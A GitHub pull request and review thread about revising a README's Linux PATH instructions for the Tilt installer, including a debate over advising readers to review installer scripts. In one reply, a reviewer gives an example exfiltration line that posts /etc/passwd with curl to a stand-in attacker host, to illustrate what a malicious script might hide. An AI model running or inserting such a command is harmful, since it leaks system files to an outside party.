### PR TITLE
Improve README steps for putting tilt in PATH

### LINKED ISSUE #1208: Update README with slightly better install instructions for Linux
The README used to mention that one should create `$HOME/.local/bin` on Linux and put binaries there, but the Tilt installer will do that for you, creating it if it doesn't already exist. So I plan to update the README with instructions that assume you've run the installer, explaining how to check that `$HOME/.local/bin` is on your `PATH` and make sure it gets added if it wasn't already there.

### PR DESCRIPTION
**Pull request by rmunn**
Fix #1208.

The README used to mention that one should create `$HOME/.local/bin` on Linux and put binaries there, but the Tilt installer will do that for you, creating it if it doesn't already exist. So I've updated the README with instructions that assume you've run the installer, explaining how to check that `$HOME/.local/bin` is on your `PATH` and make sure it gets added if it wasn't already there.

### CODE REVIEW

File: README.md
Comment (myieye) [inline README.md:34]: This seems odd to me.
The purpose of our Readme is just to explain how to get up and running, not be a tutorial on security practices, right?
If we can't trust Tilt than we're already screwed and if the tilt reviewers overlooked an introduced vulnerability from a dishonest contributor, than we're not likely to notice the vulnerability in the installer either, even if we read through it.

Comment (rmunn) [reply README.md:34]: Yes, but this kind of thing is everywhere. All over the place, people are telling you to download and run their installer script, and nobody tells you that you should review it first. I'm sick and tired of bad security practices being pushed all over the place, and I want anyone we on-board to know that that's bad practice. (Which some of them might be unaware of given that this bad practice is, as I previously mentioned, EVERYWHERE).

Comment (myieye) [reply README.md:34]: What if we comprimised by changing line 30 to something like:
`* install [Tilt](https://docs.tilt.dev/) and add it to your path (it’s good practice to review installer scripts before running them)`

Comment (myieye) [reply README.md:34]: So, I'm curious: You go through each line of every script you download?

Comment (hahn-kev) [reply README.md:34]: I agree, let's just say something but we don't need to teach them about running scripts from the internet

Comment (rmunn) [reply README.md:34]: > So, I'm curious: You go through each line of every script you run?

If it's one I've just downloaded from the Internet? Yes. I scan it quickly to make sure that what it's doing looks sensible. I don't give it a one-hour security review or anything, but I do glance through and make sure there's no `curl -X POST /etc/passwd https://evilsite.example.cn/upload` lines that don't belong.

But I'll rephrase this to be a simple "(reminder: read the script before running it)". The main point of this PR is that the script automatically creates `~/.local/bin` for you, so I want to make sure the README instructions are updated to take that into account. The "don't run installers blindly without reading them" text is a minor point.

Comment (hahn-kev) [reply README.md:34]: in our team meeting we agreed to tone down the security standpoint and simplify what we explain

Comment (rmunn) [reply README.md]: Updated instructions in commit 2cd65b86.

**Comment by rmunn** [comment]
@myieye @hahn-kev - Ready for re-review. I've trimmed the bit about reading the script down to a simple "(don't forget to read the script before running it)" parenthetical, and the rest of the changes focus on the new instructions for putting things in the PATH (because "put in `$HOME/.local/bin` or `C:\Users\yourname\bin`" is redundant now, since the Tilt install script uses those locations by default and creates them if they don't exist).

**Review by hahn-kev — APPROVED** [review]

**Review by myieye — APPROVED** [review]

**Pull request merged**
